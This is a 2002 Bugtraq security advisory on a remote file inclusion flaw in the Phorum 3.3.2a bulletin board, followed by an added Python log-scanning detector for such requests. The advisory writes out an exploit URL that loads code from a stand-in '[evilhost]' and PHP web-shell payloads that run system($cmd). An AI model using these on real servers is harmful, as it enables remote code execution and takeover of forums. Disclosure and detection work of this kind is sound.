[25490] in bugtraq
Phorum 3.3.2a remote command execution
daemon@ATHENA.MIT.EDU (Markus Arndt)
Fri May 17 19:17:38 2002
Date: Fri, 17 May 2002 20:26:40 +0200
Message-Id: <200205171826.g4HIQeX02194@mailgate5.cinetic.de>
From: Markus Arndt <markus-arndt@web.de>
To: bugtraq@securityfocus.com
Target:
Phorum 3.3.2a (prior versions?)
Description:
In Phorum 3.3.2a (a bulletin board) there is a security flaw that lets remote users
include external PHP scripts and execute arbitrary code.
Found by:
Markus Arndt <markus-arndt@web.de>
Vendor:
http://www.phorum.org
Notified Vendor:
Yes, already fixed version available
Details:
After extracting the Phorum 3.3.2a archive we have lots of PHP files and subfolders.
I just snooped around a bit and found this file vulnerable to remote script inclusion:
./plugin/replace/plugin.php
Let's see some code:
<?php
include("$PHORUM[settings_dir]/replace.php");
function mod_replace_read_body ($body) {
    global $pluginreplace;
    reset($pluginreplace);
    while(list($key,$val) = each($pluginreplace)) {
        $body = str_replace($key,$val,$body);
    }
    return $body;
}
$plugins["read_body"]["mod_replace"]="mod_replace_read_body";
?>
Easy one:
http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls
This one will fetch the file http://[evilhost]/replace.php and execute it.
If [evilhost] has PHP enabled, we could use this one as replace.php:
<?
echo("<?
system(\"\$cmd\");
?>");
?>
If it's not PHP-enabled, simply:
<?
system("$cmd");
?>
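For defenders, an added example (not part of the original post) in Python that flags requests of this kind in a web server access log: any query value that names a remote URL is treated as a file-inclusion attempt, and the PHORUM[settings_dir] parameter from this advisory is called out by name. The sample log lines and the 192.0.2.9 address standing in for [evilhost] are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Only the request line of a "combined" access-log entry is needed.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')
# A query value that points at another host is the RFI tell-tale.
REMOTE_SCHEME_RE = re.compile(r'^\s*(https?|ftps?)://', re.IGNORECASE)

def find_rfi(line):
    """Return (param, value) pairs in the request whose value names a remote URL."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    hits = []
    # parse_qsl percent-decodes once (PHORUM%5Bsettings_dir%5D -> PHORUM[settings_dir]);
    # keep_blank_values keeps parameters with empty values in the listing.
    for name, value in parse_qsl(query, keep_blank_values=True):
        decoded = unquote(value)  # second pass catches double-encoded payloads
        if REMOTE_SCHEME_RE.match(decoded):
            hits.append((name, decoded))
    return hits

def classify(line):
    """'phorum_rfi' for the advisory's parameter, 'rfi' for any other remote include, else None."""
    hits = find_rfi(line)
    if not hits:
        return None
    if any(name == "PHORUM[settings_dir]" for name, _ in hits):
        return "phorum_rfi"
    return "rfi"

# Constructed sample log lines (not real traffic); 192.0.2.9 stands in for [evilhost].
SAMPLE_LOG = [
    '203.0.113.5 - - [17/May/2002:20:26:40 +0200] "GET /phorum/plugin/replace/plugin.php'
    '?PHORUM[settings_dir]=http://192.0.2.9&cmd=ls HTTP/1.0" 200 512',
    '203.0.113.5 - - [17/May/2002:20:27:01 +0200] "GET /phorum/plugin/replace/plugin.php'
    '?PHORUM%5Bsettings_dir%5D=http%3A%2F%2F192.0.2.9 HTTP/1.0" 200 512',
    '198.51.100.7 - - [17/May/2002:20:28:13 +0200] "GET /phorum/list.php?f=1 HTTP/1.1" 200 8192',
    '198.51.100.7 - - [17/May/2002:20:29:00 +0200] "GET /index.php?page=ftp://192.0.2.9/x HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line), find_rfi(line))
```

Percent-encoded variants of the parameter name and value are normalised before matching, so the second sample line is caught as well as the plain form from the advisory.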
Markus Arndt <markus-arndt@web.de>
http://skka.de